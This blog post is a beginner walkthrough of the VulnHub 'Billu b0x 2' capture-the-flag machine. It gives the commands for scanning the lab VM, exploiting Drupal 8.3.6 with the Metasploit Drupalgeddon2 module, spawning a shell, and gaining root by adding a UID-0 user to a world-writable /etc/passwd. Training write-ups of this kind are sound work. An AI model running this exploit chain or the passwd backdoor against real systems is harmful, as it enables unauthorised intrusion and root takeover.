billu: b0x 2 Walkthrough

on

Hello Everyone, let's begin

ctf link : https://www.vulnhub.com/entry/billu-b0x-2,238/

download link : https://download.vulnhub.com/billu/billu-b0x2.7z

I opened it with virtualbox in bridge mode with inteface named vmnet8 (172.16.59.0/24).

CTF level : Beginner

Vulnerabilities to exploit : Drupalgeddon 2 Forms API Property Injection, /etc/passwd edit permission

Technique and tools : WappalyzerDroopescan, Searchsploit, Metasploit, openssl

I found IP using arp-scan
sudo arp-scan --interface vmnet8 --local

I found IP of the ctf machine 172.16.59.155

I started scanning well-known 1000 ports and banner grabbing using nmap
sudo nmap -sSV 172.16.59.155

I tried to fuzz port 22 and 111 first. But these things didn't gave me fascinating results. Athough OpenSSH is exploitable. I was looking for easy entry. So I looked into http service. When I opened http://172.16.59.155 in browser, I saw Drupal.


I  wanted the versoin of this drupal machine. So I used Droopescan
droopescan scan drupal -u http://172.16.59.155

It gave me Drupal version : 8.3.6

I used searchsploit to check if there any exploit exist.
searchsploit drupal|grep 8

I saw Drupalgeddon2 RCE (Metasploit).

I opened msfconsole. I searched for drupalgeddon2.
msfconsole
msf5 > search drupalgeddon2

I found one exploit. I used this exploit
use exploit/unix/webapp/drupal_drupalgeddon2
set rhosts 172.16.59.155
exploit
And this was easy af.



Now It's time for shell and privilege escalation. I started tty shell first.
meterpreter > shell
python -c 'import pty;pty.spawn("/bin/bash");'

When I tested /etc/passwd permission. I found it had 777 permission. It means I can add my own user.


I had to create user in format of /etc/passwd. I'm using openssl for password creation
openssl passwd -1 -salt john password
Output : $1$john$xeOd1Br2.VH1SBVMwHrR10 
Here I'm using md5 to create hash and salted it with "john". The Password is password. Now I have to insert a new entry into /etc/passwd.
echo 'john:$1$john$xeOd1Br2.VH1SBVMwHrR10:0:0:john:/root:/bin/bash'>>/etc/passwd

I checked the entry using
cat /etc/passwd|tail -n 2
It was perfect entry. Now I just had to switch to john.
su john
Password: password
And I'm root now.

Comments

Post a Comment